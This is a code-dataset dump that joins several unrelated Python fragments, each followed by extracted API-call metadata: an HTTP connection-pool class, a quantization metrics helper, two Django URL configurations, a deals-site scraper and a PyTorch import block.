oSelf.__oTerminatedLock.fRelease();
finally:
oSelf.__oTerminatedPropertyLock.fRelease();
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
fShowDebugOutput("cHTTPConnectionsToServerPool terminated.");
oSelf.fFireCallbacks("terminated");
@ShowDebugOutput
def fStop(oSelf):
if oSelf.bTerminated:
return fShowDebugOutput("Already terminated");
if oSelf.__bStopping:
return fShowDebugOutput("Already stopping");
fShowDebugOutput("Stopping...");
oSelf.__bStopping = True;
# We are now officially stopping, so there should not be any new connections
# added from this point onward. If there are existing connections, we will
# stop them:
for oConnection in oSelf.__aoConnections[:]:
oConnection.fStop();
# If there are no connections and we have not terminated, do so now:
oSelf.__fReportTerminatedIfNoMoreConnectionsExist();
@ShowDebugOutput
def fTerminate(oSelf):
if oSelf.bTerminated:
return fShowDebugOutput("Already terminated");
fShowDebugOutput("Terminated...");
oSelf.__bStopping = True;
# We are now officially stopping, so there should not be any new connections
# added from this point onward. If there are existing connections, we will
# terminate them:
for oConnection in oSelf.__aoConnections[:]:
oConnection.fTerminate();
# If there are no connections and we have not terminated, do so now:
oSelf.__fReportTerminatedIfNoMoreConnectionsExist();
@ShowDebugOutput
def fbWait(oSelf, bTimeoutInSeconds):
return oSelf.__oTerminatedLock.fbWait(bTimeoutInSeconds);
def fo0GetConnectionAndStartTransaction(
oSelf,
n0zConnectTimeoutInSeconds = zNotProvided,
bSecure = True,
n0zSecureTimeoutInSeconds = zNotProvided,
n0zTransactionTimeoutInSeconds = zNotProvided,
):
# Wrapper for the internal version. This external version also marks the
# connection as having been passed externally, to prevent it from being
# used as part of the regular pool. The caller is responsible for closing
# the connection.
o0Connection = oSelf.__fo0GetConnectionAndStartTransaction(
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds,
);
if o0Connection is None:
return None;
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__aoConnections.remove(o0Connection);
oSelf.__aoExternalizedConnections.append(o0Connection);
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
return o0Connection;
def __fo0GetConnectionAndStartTransaction(
oSelf,
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds,
):
if oSelf.__bStopping:
return None;
fShowDebugOutput("Getting connection...");
if bSecure:
# Secure connections may already exist and can be reused:
o0Connection = oSelf.__fo0StartTransactionOnExistingConnection(n0zTransactionTimeoutInSeconds);
if o0Connection is not None:
return o0Connection;
if oSelf.__bStopping:
return None;
oConnection = oSelf.__foCreateNewConnectionAndStartTransaction(
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds,
);
if oSelf.__bStopping:
return None;
assert oConnection, \
"A new connection was not established even though we are not stopping!?";
return oConnection;
@ShowDebugOutput
def fo0SendRequestAndReceiveResponse(oSelf,
oRequest,
n0zConnectTimeoutInSeconds = zNotProvided, n0zSecureTimeoutInSeconds = zNotProvided, n0zTransactionTimeoutInSeconds = zNotProvided,
bEndTransaction = True,
u0zMaxStatusLineSize = zNotProvided,
u0zMaxHeaderNameSize = zNotProvided, u0zMaxHeaderValueSize = zNotProvided, u0zMaxNumberOfHeaders = zNotProvided,
u0zMaxBodySize = zNotProvided, u0zMaxChunkSize = zNotProvided, u0zMaxNumberOfChunks = zNotProvided,
u0MaxNumberOfChunksBeforeDisconnecting = zNotProvided, # disconnect and return response once this many chunks are received.
):
# Send a request to the server and receive a response.
# An existing connection is reused if one is available. A new connection
# if created if none is available and there are not too many connections.
# If not specified, always check the hostname when the connection is secure.
# Can throw a max-connections-reached exception
if oSelf.__bStopping:
return None;
oConnection = oSelf.__fo0GetConnectionAndStartTransaction(
n0zConnectTimeoutInSeconds = n0zConnectTimeoutInSeconds,
bSecure = True,
n0zSecureTimeoutInSeconds = n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds = n0zTransactionTimeoutInSeconds,
);
# oConnection can be None only if we are stopping.
if oSelf.__bStopping:
return None;
assert oConnection, \
"A new connection was not established even though we are not stopping!?";
# Returns cResponse instance if response was received.
oResponse = oConnection.fo0SendRequestAndReceiveResponse(
oRequest,
bStartTransaction = False,
u0zMaxStatusLineSize = u0zMaxStatusLineSize,
u0zMaxHeaderNameSize = u0zMaxHeaderNameSize,
u0zMaxHeaderValueSize = u0zMaxHeaderValueSize,
u0zMaxNumberOfHeaders = u0zMaxNumberOfHeaders,
u0zMaxBodySize = u0zMaxBodySize,
u0zMaxChunkSize = u0zMaxChunkSize,
u0zMaxNumberOfChunks = u0zMaxNumberOfChunks,
u0MaxNumberOfChunksBeforeDisconnecting = u0MaxNumberOfChunksBeforeDisconnecting, # disconnect and return response once this many chunks are received.
bEndTransaction = bEndTransaction,
);
if oSelf.__bStopping:
fShowDebugOutput("Stopping.");
return None;
assert oResponse, \
"Expected a response but got %s" % repr(oResponse);
oSelf.fFireCallbacks("request sent and response received", oConnection, oRequest, oResponse);
return oResponse;
@ShowDebugOutput
def __fo0StartTransactionOnExistingConnection(oSelf, n0zTransactionTimeoutInSeconds):
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
for oConnection in oSelf.__aoConnections:
if oSelf.__bStopping:
return None;
if oConnection.fbStartTransaction(n0zTransactionTimeoutInSeconds):
return oConnection;
return None;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
@ShowDebugOutput
def __foCreateNewConnectionAndStartTransaction(oSelf,
n0zConnectTimeoutInSeconds,
bSecure,
n0zSecureTimeoutInSeconds,
n0zTransactionTimeoutInSeconds
):
# Make sure we would not create too many connections and add a pending connection:
# Can throw a max-connections-reached exception
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
if (
oSelf.__u0MaxNumberOfConnectionsToServer is not None
and len(oSelf.__aoConnections) + oSelf.__uPendingConnects == oSelf.__u0MaxNumberOfConnectionsToServer
):
raise cMaxConnectionsReachedException(
"Cannot create more connections to the server",
{"uMaxNumberOfConnectionsToServer": oSelf.__u0MaxNumberOfConnectionsToServer}
);
oSelf.__uPendingConnects += 1;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
# Try to establish a connection:
try:
oConnection = cHTTPConnection.foConnectTo(
sbHostname = oSelf.__oServerBaseURL.sbHostname,
uPortNumber = oSelf.__oServerBaseURL.uPortNumber,
n0zConnectTimeoutInSeconds = n0zConnectTimeoutInSeconds,
o0SSLContext = oSelf.__o0SSLContext if bSecure else None,
n0zSecureTimeoutInSeconds = n0zSecureTimeoutInSeconds,
f0ResolveHostnameCallback = oSelf.__fHandleResolveHostnameCallback
);
except Exception as oException:
oSelf.fFireCallbacks("connect failed", oSelf.__oServerBaseURL.sbHostname, oSelf.__oServerBaseURL.uPortNumber, oException);
# remove a pending connection.
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__uPendingConnects -= 1;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
raise;
# Start a transaction to prevent other threads from using it:
assert oConnection.fbStartTransaction(n0zTransactionTimeoutInSeconds), \
"Cannot start a transaction on a new connection (%s)" % repr(oConnection);
# remove a pending connection and add it.
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__uPendingConnects -= 1;
oSelf.__aoConnections.append(oConnection);
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
# Add some event handlers
oConnection.fAddCallback("bytes written", oSelf.__fHandleBytesWrittenCallbackFromConnection);
oConnection.fAddCallback("bytes read", oSelf.__fHandleBytesReadCallbackFromConnection);
oConnection.fAddCallback("request sent", oSelf.__fHandleRequestSentCallbackFromConnection);
oConnection.fAddCallback("response received", oSelf.__fHandleResponseReceivedCallbackFromConnection);
oConnection.fAddCallback("terminated", oSelf.__fHandleTerminatedCallbackFromConnection);
oSelf.fFireCallbacks("new connection", oConnection);
return oConnection;
def __fHandleResolveHostnameCallback(oSelf, sbHostname, iFamily, sCanonicalName, sIPAddress):
oSelf.fFireCallbacks("hostname resolved", sbHostname = sbHostname, iFamily = iFamily, sCanonicalName = sCanonicalName, sIPAddress = sIPAddress);
def __fHandleBytesWrittenCallbackFromConnection(oSelf, oConnection, sbBytesWritten):
oSelf.fFireCallbacks("bytes written", oConnection, sbBytesWritten);
def __fHandleBytesReadCallbackFromConnection(oSelf, oConnection, sbBytesRead):
oSelf.fFireCallbacks("bytes read", oConnection, sbBytesRead);
def __fHandleRequestSentCallbackFromConnection(oSelf, oConnection, oRequest):
oSelf.fFireCallbacks("request sent", oConnection, oRequest);
def __fHandleResponseReceivedCallbackFromConnection(oSelf, oConnection, oResponse):
oSelf.fFireCallbacks("response received", oConnection, oResponse);
@ShowDebugOutput
def __fHandleTerminatedCallbackFromConnection(oSelf, oConnection):
oSelf.__oConnectionsPropertyLock.fAcquire();
try:
oSelf.__aoConnections.remove(oConnection);
bCheckIfTerminated = oSelf.__bStopping and len(oSelf.__aoConnections) == 0;
finally:
oSelf.__oConnectionsPropertyLock.fRelease();
oSelf.fFireCallbacks("connection terminated", oConnection);
if bCheckIfTerminated:
oSelf.__fReportTerminatedIfNoMoreConnectionsExist();
def fasGetDetails(oSelf):
uConnectionsCount = oSelf.uConnectionsCount;
bTerminated = oSelf.bTerminated;
return [s for s in [
str(oSelf.__oServerBaseURL.sbBase, 'latin1'),
"%d connections" % uConnectionsCount if not bTerminated else None,
"secure" if oSelf.__o0SSLContext else None,
"terminated" if bTerminated else
"stopping" if oSelf.__bStopping else None,
] if s];
def __repr__(oSelf):
sModuleName = ".".join(oSelf.__class__.__module__.split(".")[:-1]);
return "<%s.%s#%X|%s>" % (sModuleName, oSelf.__class__.__name__, id(oSelf), "|".join(oSelf.fasGetDetails()));
def __str__(oSelf):
return "%s#%X{%s}" % (oSelf.__class__.__name__, id(oSelf), ", ".join(oSelf.fasGetDetails()));
for cException in acExceptions:
setattr(cHTTPConnectionsToServerPool, cException.__name__, cException);
| [
"mMultiThreading.cLock",
"mDebugOutput.fShowDebugOutput"
] | [((1342, 1466), 'mMultiThreading.cLock', 'cLock', (["('%s.__oConnectionsPropertyLock' % oSelf.__class__.__name__)"], {'n0DeadlockTimeoutInSeconds': 'gnDeadlockTimeoutInSeconds'}), "('%s.__oConnectionsPropertyLock' % oSelf.__class__.__name__,\n n0DeadlockTimeoutInSeconds=gnDeadlockTimeoutInSeconds)\n", (1347, 1466), False, 'from mMultiThreading import cLock, cWithCallbacks\n'), ((1771, 1896), 'mMultiThreading.cLock', 'cLock', (["('%s.__oTerminatedEventFiredLock' % oSelf.__class__.__name__)"], {'n0DeadlockTimeoutInSeconds': 'gnDeadlockTimeoutInSeconds'}), "('%s.__oTerminatedEventFiredLock' % oSelf.__class__.__name__,\n n0DeadlockTimeoutInSeconds=gnDeadlockTimeoutInSeconds)\n", (1776, 1896), False, 'from mMultiThreading import cLock, cWithCallbacks\n'), ((1944, 2014), 'mMultiThreading.cLock', 'cLock', (["('%s.__oTerminatedLock' % oSelf.__class__.__name__)"], {'bLocked': '(True)'}), "('%s.__oTerminatedLock' % oSelf.__class__.__name__, bLocked=True)\n", (1949, 2014), False, 'from mMultiThreading import cLock, cWithCallbacks\n'), ((3586, 3646), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""cHTTPConnectionsToServerPool terminated."""'], {}), "('cHTTPConnectionsToServerPool terminated.')\n", (3602, 3646), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((3890, 3921), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Stopping..."""'], {}), "('Stopping...')\n", (3906, 3921), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((4467, 4500), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Terminated..."""'], {}), "('Terminated...')\n", (4483, 4500), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((6252, 6293), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Getting connection..."""'], {}), "('Getting connection...')\n", (6268, 6293), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((3769, 3807), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Already terminated"""'], {}), "('Already terminated')\n", (3785, 3807), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((3848, 3884), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Already stopping"""'], {}), "('Already stopping')\n", (3864, 3884), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((4423, 4461), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Already terminated"""'], {}), "('Already terminated')\n", (4439, 4461), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n'), ((9235, 9264), 'mDebugOutput.fShowDebugOutput', 'fShowDebugOutput', (['"""Stopping."""'], {}), "('Stopping.')\n", (9251, 9264), False, 'from mDebugOutput import ShowDebugOutput, fShowDebugOutput\n')] |
# Copyright (C) 2020-2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
from copy import deepcopy
from functools import partial
import numpy as np
import scipy
from addict import Dict
from ....algorithms.quantization import utils as eu
from ....engines.ac_engine import ACEngine
from ....graph.model_utils import get_nodes_by_type
from ....graph.node_utils import get_all_node_outputs
from ....graph.utils import find_operation_matches
from ....samplers.creator import create_sampler
SPECIAL_METRICS = ['cmc', 'reid_map', 'pairwise_accuracy_subsets', 'pairwise_accuracy', 'normalized_embedding_accuracy',
'face_recognition_tafa_pair_metric', 'localization_recall',
'coco_orig_keypoints_precision', 'coco_orig_segm_precision', 'coco_orig_keypoints_precision']
METRICS_CONFIGS = {'sigmoid_recom_loss': {'metrics': 'log_loss',
'postprocessing': 'sigmoid_normalize_recommendation'},
'coco_precision': {'metrics': 'coco_precision'},
'coco_segm_precision': {'metrics': 'coco_segm_precision'}}
METRIC2PROXY_METRIC = {
'hit_ratio':
{
'persample': 'sigmoid_recom_loss',
'ranking': 'sigmoid_recom_loss'
},
'ndcg':
{
'persample': 'sigmoid_recom_loss',
'ranking': 'sigmoid_recom_loss'
},
'coco_orig_precision':
{
'persample': 'coco_precision'
},
'coco_orig_keypoints_precision':
{
'persample': 'coco_precision'
},
'coco_orig_segm_precision':
{
'persample': 'coco_segm_precision'
}
}
def create_metric_config(engine, algo_config: Dict, force_logit_comparison=False,
logit_distance_type='cosine') -> Dict:
def create_metric_params(metric_name):
engine_metrics_attributes = engine.get_metrics_attributes()
if metric_name not in engine_metrics_attributes:
RuntimeError('Couldn\'t create metric parameters. '
'Metric {} not registered in the engine.'.format(metric_name))
params = Dict()
params.name = metric_name
params.type = engine_metrics_attributes[metric_name]['type']
params.is_special = (params.type in SPECIAL_METRICS) or force_logit_comparison
if engine_metrics_attributes[metric_name]['direction'] == 'higher-better':
params.comparator = (lambda a: a)
elif engine_metrics_attributes[metric_name]['direction'] == 'higher-worse':
params.comparator = (lambda a: -a)
else:
raise ValueError('Unexpected {} metric direction value.'.format(metric_name))
params.sort_fn = partial(sort_by_logit_distance, distance=logit_distance_type) \
if params.is_special else partial(sort_by_metric_difference, comp_fn=params.comparator)
return params
def metric_to_proxy_map(metrics):
"""Determines which metrics need proxy metrics and creates metrics to proxy metrics map.
:param metrics: optimizable metrics names
:returns a dictionary of metrics to proxy metrics mapping {metric_name: 'persample': proxy_name,
'ranking': proxy_name}
a list of proxy metrics names to register
"""
def update_proxy_list(proxy_metric_name):
"""Updates a list of proxy metrics names to register.
:return a proxy metric name in accordance with the engine naming
"""
proxy_config = METRICS_CONFIGS.get(proxy_metric_name, {})
metric_config = proxy_config.get('metrics')
postprocessing_config = proxy_config.get('postprocessing')
if metric_config or postprocessing_config:
to_register.add(proxy_metric_name)
return metric_name_from_config(metric_config)
match_names_config = Dict({metric_name: {} for metric_name in metrics})
to_register = set()
for metric_name, metric_type in metrics:
if metric_type in METRIC2PROXY_METRIC:
persample_metric_name = METRIC2PROXY_METRIC[metric_type].get('persample')
persample_proxy_metric_name = update_proxy_list(persample_metric_name)
if persample_proxy_metric_name:
match_names_config[metric_name].persample = persample_proxy_metric_name
ranking_metric_name = METRIC2PROXY_METRIC[metric_type].get('ranking')
ranking_proxy_metric_name = update_proxy_list(ranking_metric_name)
if ranking_proxy_metric_name:
match_names_config[metric_name].ranking = ranking_proxy_metric_name
return match_names_config, list(to_register)
metrics_attributes = engine.get_metrics_attributes()
# configure which metrics to optimize
if algo_config.metrics:
metrics_names = []
for metric in algo_config.metrics:
metric_type = metric.type if metric.type else metric.name
metrics_names.append((metric.name, metric_type))
else:
metrics_names = [(metric_name, metric_attr.get('type', metric_name)) for metric_name, metric_attr
in metrics_attributes.items()]
# register proxy metrics
metrics_to_proxy_map, metrics_to_register = metric_to_proxy_map(metrics_names)
register_metrics(engine, metrics_to_register)
metrics_config = Dict()
for metric, _ in metrics_names:
persample_name = metrics_to_proxy_map[metric].get('persample', metric)
ranking_name = metrics_to_proxy_map[metric].get('ranking', metric)
metrics_config[metric].persample = create_metric_params(persample_name)
metrics_config[metric].ranking = create_metric_params(ranking_name)
metrics_config[metric].update(create_metric_params(metric))
return metrics_config
def metric_name_from_config(metric_config):
if isinstance(metric_config, str):
return metric_config
if isinstance(metric_config, dict):
return metric_config.get('name', metric_config['type'])
return None
def register_metrics(engine, metrics_names: list):
"""Registers metrics and postprocessing in the engine.
:param engine: an engine in which metrics will be registered
:param metrics_names: a list of metrics names
"""
registered_metrics = engine.get_metrics_attributes()
for metric in metrics_names:
if metric not in METRICS_CONFIGS:
raise ValueError('Cannot register metric. Unsupported name {}.'.format(metric))
proxy_config = METRICS_CONFIGS.get(metric, {})
if 'metrics' in proxy_config:
metric_config = proxy_config['metrics']
if metric_name_from_config(metric_config) not in registered_metrics:
register_metric(engine, metric_config)
if 'postprocessing' in proxy_config:
postprocessing_config = proxy_config['postprocessing']
register_postprocessing(engine, postprocessing_config)
def sort_by_logit_distance(u, v, reverse=False, distance='cosine'):
if len(u) != len(v):
raise RuntimeError('Cannot compare samples. '
'Lists of per-sample metric results should be the same length.')
kd_distance = lambda u, v: scipy.stats.entropy(scipy.special.softmax(u),
scipy.special.softmax(v))
mse_distance = lambda u, v: np.mean((u - v) ** 2)
distance_function = {
'cosine': scipy.spatial.distance.cosine,
'kd': kd_distance,
'mse': mse_distance,
}
distance_between_samples = np.array([distance_function[distance](ui.flatten(), vi.flatten())
for ui, vi in zip(u, v)])
sorted_arr = np.argsort(distance_between_samples)
if reverse:
sorted_arr = np.flip(sorted_arr)
return sorted_arr
def sort_by_metric_difference(u, v, comp_fn=lambda a: a, reverse=False):
if len(u) != len(v):
raise RuntimeError('Cannot compare samples. '
'Lists of per-sample metric results should be the same length.')
u = np.asarray(u)
v = np.asarray(v)
sorted_arr = np.argsort(comp_fn(u - v))
if reverse:
sorted_arr = np.flip(sorted_arr)
return sorted_arr
def register_metric(engine, metric_config):
if isinstance(engine, ACEngine):
engine.add_metric(metric_config)
else:
raise NotImplementedError('{} engine cannot register new metrics.'
.format(type(engine).__name__))
def register_postprocessing(engine, postprocessing_config):
if isinstance(engine, ACEngine):
engine.add_postprocessing(postprocessing_config)
else:
raise NotImplementedError('{} engine cannot register new postprocessing.'
.format(type(engine).__name__))
def is_preset_performance(config: Dict):
if config.weights.mode == 'symmetric' and config.activations.mode == 'symmetric':
return True
if config.weights.mode == 'asymmetric' or config.activations.mode == 'asymmetric':
return False
if config.preset == 'performance':
return True
return False
def get_mixed_preset_config(config: Dict):
config = deepcopy(config)
config.update(preset='mixed')
if config.activations.mode:
config.activations.mode = 'asymmetric'
if config.weights.mode:
config.weights.mode = 'symmetric'
return config
def get_num_of_quantized_ops(model, quantizable_operations):
quantized_ops = set()
nodes_to_see = []
for fq_node in get_nodes_by_type(model, ['FakeQuantize']):
nodes_to_see.extend(get_all_node_outputs(fq_node))
while nodes_to_see:
child = nodes_to_see.pop()
if find_operation_matches(quantizable_operations, child):
quantized_ops.add(child)
continue
nodes_to_see.extend(get_all_node_outputs(child))
return len(quantized_ops)
def evaluate_model(
model, engine,
dataset_size,
subset_indices=None,
print_progress=True,
metrics_config=None,
per_sample_subset_indices=None,
output_node_name=None,
stats_layout=None,
):
"""Evaluates the model and processes metrics values
:param model: model to evaluate
:param subset_indices: image indices to evaluate on. If None evaluate on whole dataset
:param per_sample_subset_indices: image indices for which to return per-sample metrics.
If None for all predicted images
:param print_progress: Whether to print inference progress
:returns a dictionary of predicted metrics {metric_name: value}
a dictionary of per-sample metrics values {metric_name: [values]}
"""
engine.set_model(model)
eu.select_evaluation_dataset(engine)
if not subset_indices:
subset_indices = range(dataset_size)
index_sampler = create_sampler(engine, samples=subset_indices)
(metrics_per_sample, metrics), raw_output = engine.predict(stats_layout=stats_layout,
sampler=index_sampler,
metric_per_sample=True,
print_progress=print_progress)
raw_output = process_raw_output(raw_output, output_node_name)
metrics_per_sample = process_per_sample_metrics(metrics_per_sample,
metrics_config,
per_sample_subset_indices,
raw_output=raw_output)
metrics = dict((name, value) for name, value in metrics.items() if name in metrics_config)
eu.reset_dataset_to_default(engine)
return metrics, metrics_per_sample
def process_raw_output(output, output_node_name):
if not output:
return []
return output[output_node_name]['output_logits']
def process_per_sample_metrics(metrics_per_sample, metrics_config,
indices=None, raw_output=None):
"""Creates a dictionary of per-sample metrics values {metric_name: [values]}
:param metrics_per_sample: list of per-sample metrics
:param indices: indices of samples to be considered. All if None
:param raw_output: raw output from the model
:return processed dictionary
"""
metrics_to_keep = {config.persample.name: config.persample
for config in metrics_config.values()}
if not metrics_to_keep:
return {}
processed_metrics_per_sample = dict((name, []) for name in metrics_to_keep)
for metric_name, metric_params in metrics_to_keep.items():
if metric_params.is_special:
processed_metrics_per_sample[metric_name] = raw_output
for value in metrics_per_sample:
if value['metric_name'] in metrics_to_keep:
if metrics_to_keep[value['metric_name']].is_special:
continue
if value['result'] is not None:
result_value = np.nanmean(value['result'])
else:
result_value = None
processed_metrics_per_sample[value['metric_name']].append(result_value)
# check that all metrics have equal number of samples
if not len({len(value) for value in processed_metrics_per_sample.values()}) == 1:
raise RuntimeError('Inconsistent number of per-sample metric values')
if indices:
for name, values in processed_metrics_per_sample.items():
processed_metrics_per_sample[name] = [values[i] for i in indices]
return processed_metrics_per_sample
| [
"addict.Dict",
"numpy.mean",
"numpy.flip",
"numpy.asarray",
"numpy.argsort",
"numpy.nanmean",
"functools.partial",
"copy.deepcopy",
"scipy.special.softmax"
] | [((5558, 5564), 'addict.Dict', 'Dict', ([], {}), '()\n', (5562, 5564), False, 'from addict import Dict\n'), ((7929, 7965), 'numpy.argsort', 'np.argsort', (['distance_between_samples'], {}), '(distance_between_samples)\n', (7939, 7965), True, 'import numpy as np\n'), ((8299, 8312), 'numpy.asarray', 'np.asarray', (['u'], {}), '(u)\n', (8309, 8312), True, 'import numpy as np\n'), ((8321, 8334), 'numpy.asarray', 'np.asarray', (['v'], {}), '(v)\n', (8331, 8334), True, 'import numpy as np\n'), ((9438, 9454), 'copy.deepcopy', 'deepcopy', (['config'], {}), '(config)\n', (9446, 9454), False, 'from copy import deepcopy\n'), ((2174, 2180), 'addict.Dict', 'Dict', ([], {}), '()\n', (2178, 2180), False, 'from addict import Dict\n'), ((4016, 4066), 'addict.Dict', 'Dict', (['{metric_name: {} for metric_name in metrics}'], {}), '({metric_name: {} for metric_name in metrics})\n', (4020, 4066), False, 'from addict import Dict\n'), ((7587, 7608), 'numpy.mean', 'np.mean', (['((u - v) ** 2)'], {}), '((u - v) ** 2)\n', (7594, 7608), True, 'import numpy as np\n'), ((8003, 8022), 'numpy.flip', 'np.flip', (['sorted_arr'], {}), '(sorted_arr)\n', (8010, 8022), True, 'import numpy as np\n'), ((8416, 8435), 'numpy.flip', 'np.flip', (['sorted_arr'], {}), '(sorted_arr)\n', (8423, 8435), True, 'import numpy as np\n'), ((2763, 2824), 'functools.partial', 'partial', (['sort_by_logit_distance'], {'distance': 'logit_distance_type'}), '(sort_by_logit_distance, distance=logit_distance_type)\n', (2770, 2824), False, 'from functools import partial\n'), ((2865, 2926), 'functools.partial', 'partial', (['sort_by_metric_difference'], {'comp_fn': 'params.comparator'}), '(sort_by_metric_difference, comp_fn=params.comparator)\n', (2872, 2926), False, 'from functools import partial\n'), ((7452, 7476), 'scipy.special.softmax', 'scipy.special.softmax', (['u'], {}), '(u)\n', (7473, 7476), False, 'import scipy\n'), ((7529, 7553), 'scipy.special.softmax', 'scipy.special.softmax', (['v'], {}), '(v)\n', (7550, 7553), False, 'import scipy\n'), ((13422, 13449), 'numpy.nanmean', 'np.nanmean', (["value['result']"], {}), "(value['result'])\n", (13432, 13449), True, 'import numpy as np\n')] |
from django.urls import path, include
from rest_framework.authtoken import views
from .views import home
urlpatterns = [
path('', home, name='api.home'),
path('category/', include('api.category.urls')),
path('product/', include('api.product.urls')),
path('order/', include('api.order.urls')),
path('payment/', include('api.payment.urls')),
path('user/', include('api.user.urls')),
]
| [
"django.urls.path",
"django.urls.include"
] | [((126, 157), 'django.urls.path', 'path', (['""""""', 'home'], {'name': '"""api.home"""'}), "('', home, name='api.home')\n", (130, 157), False, 'from django.urls import path, include\n'), ((181, 209), 'django.urls.include', 'include', (['"""api.category.urls"""'], {}), "('api.category.urls')\n", (188, 209), False, 'from django.urls import path, include\n'), ((233, 260), 'django.urls.include', 'include', (['"""api.product.urls"""'], {}), "('api.product.urls')\n", (240, 260), False, 'from django.urls import path, include\n'), ((282, 307), 'django.urls.include', 'include', (['"""api.order.urls"""'], {}), "('api.order.urls')\n", (289, 307), False, 'from django.urls import path, include\n'), ((331, 358), 'django.urls.include', 'include', (['"""api.payment.urls"""'], {}), "('api.payment.urls')\n", (338, 358), False, 'from django.urls import path, include\n'), ((379, 403), 'django.urls.include', 'include', (['"""api.user.urls"""'], {}), "('api.user.urls')\n", (386, 403), False, 'from django.urls import path, include\n')] |
from django.urls import path
from notes_app import views
urlpatterns = [
path('',views.home,name='home'),
path('home/',views.home,name='home'),
path('add/',views.add,name='add'),
path('edit/<int:id>',views.edit,name='edit'),
path('delete/<int:id>',views.delete, name='delete')
]
| [
"django.urls.path"
] | [((77, 110), 'django.urls.path', 'path', (['""""""', 'views.home'], {'name': '"""home"""'}), "('', views.home, name='home')\n", (81, 110), False, 'from django.urls import path\n'), ((114, 152), 'django.urls.path', 'path', (['"""home/"""', 'views.home'], {'name': '"""home"""'}), "('home/', views.home, name='home')\n", (118, 152), False, 'from django.urls import path\n'), ((156, 191), 'django.urls.path', 'path', (['"""add/"""', 'views.add'], {'name': '"""add"""'}), "('add/', views.add, name='add')\n", (160, 191), False, 'from django.urls import path\n'), ((195, 241), 'django.urls.path', 'path', (['"""edit/<int:id>"""', 'views.edit'], {'name': '"""edit"""'}), "('edit/<int:id>', views.edit, name='edit')\n", (199, 241), False, 'from django.urls import path\n'), ((245, 297), 'django.urls.path', 'path', (['"""delete/<int:id>"""', 'views.delete'], {'name': '"""delete"""'}), "('delete/<int:id>', views.delete, name='delete')\n", (249, 297), False, 'from django.urls import path\n')] |
import requests
from bs4 import BeautifulSoup
from .sections import *
SITE_PELANDO_COMPUTADORES = "https://www.pelando.com.br/grupo/computadores-e-informatica"
SITE_PELANDO_TECEESCRITORIO = "https://www.pelando.com.br/grupo/tecnologia-e-escritorio"
SITE_PELANDO_SMARTPHONES = "https://www.pelando.com.br/grupo/celulares-e-smartphones"
SITE_PELANDO_LIVROS = "https://www.pelando.com.br/grupo/livros"
SITE_PELANDO_VIDEOGAMES = "https://www.pelando.com.br/grupo/videogames"
ALL_SECTIONS = {
SECTION_COMPUTADORES: SITE_PELANDO_COMPUTADORES,
SECTION_TECEESCRITORIO: SITE_PELANDO_TECEESCRITORIO,
SECTION_SMARTPHONES: SITE_PELANDO_SMARTPHONES,
SECTION_LIVROS: SITE_PELANDO_LIVROS,
SECTION_VIDEOGAMES: SITE_PELANDO_VIDEOGAMES
}
def scrapePelandoSection(section=None,output=None):
"Receve uma URL e um objeto do tipo Queue da biblioteca multiprocessing(padrão). Os resultidas são salvos na Queue."
request_phase_success = True
result = []
try:
source = requests.get(section).text
soup = BeautifulSoup(source,'lxml')
promotion = soup.select('article.thread.thread--type-card')
section_name = section.split('/')[-1].split('?')[0]
except Exception as e:
print("Error during request phase")
print(e)
request_phase_success = False
if request_phase_success:
for item in promotion:
try:
temperatura = item.select("span.vote-temp")[0].text.split('°')[0].strip()
if temperatura.lower() != "super quente!":
id = item.get('id')
titulo = item.select("a.thread-link.thread-title--card")[0].text.strip()
valor = item.select("span.thread-price")[0].text.strip()
result.append({"id": id,"nome": titulo, "valor": valor, "temperatura": temperatura, "section": section_name})
except IndexError as e:
# Pula itens sem um dos campos
pass
except Exception as e:
print("Erro:{} em {}".format(e,section))
output.put(result)
print("## {} FINALIZOU ##".format(section))
| [
"bs4.BeautifulSoup",
"requests.get"
] | [((1034, 1063), 'bs4.BeautifulSoup', 'BeautifulSoup', (['source', '"""lxml"""'], {}), "(source, 'lxml')\n", (1047, 1063), False, 'from bs4 import BeautifulSoup\n'), ((992, 1013), 'requests.get', 'requests.get', (['section'], {}), '(section)\n', (1004, 1013), False, 'import requests\n')] |
from collections import defaultdict
import time
from joblib import Parallel, delayed
from multiprocessing import cpu_count
from math import ceil
import torch
from torch import nn
import torch.multiprocessing as mp
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
from torch.utils.data import TensorDataset, DataLoader, SequentialSampler
from torch.utils.data.distributed import DistributedSampler
from nltk.corpus import stopwords
from transformers import AdamW, get_linear_schedule_with_warmup
# =================================================================================
#from transformers.models.camembert.tokenization_camembert import CamembertTokenizer
from transformers import BertTokenizer
# =================================================================================
import numpy as np
import os
import shutil
import sys
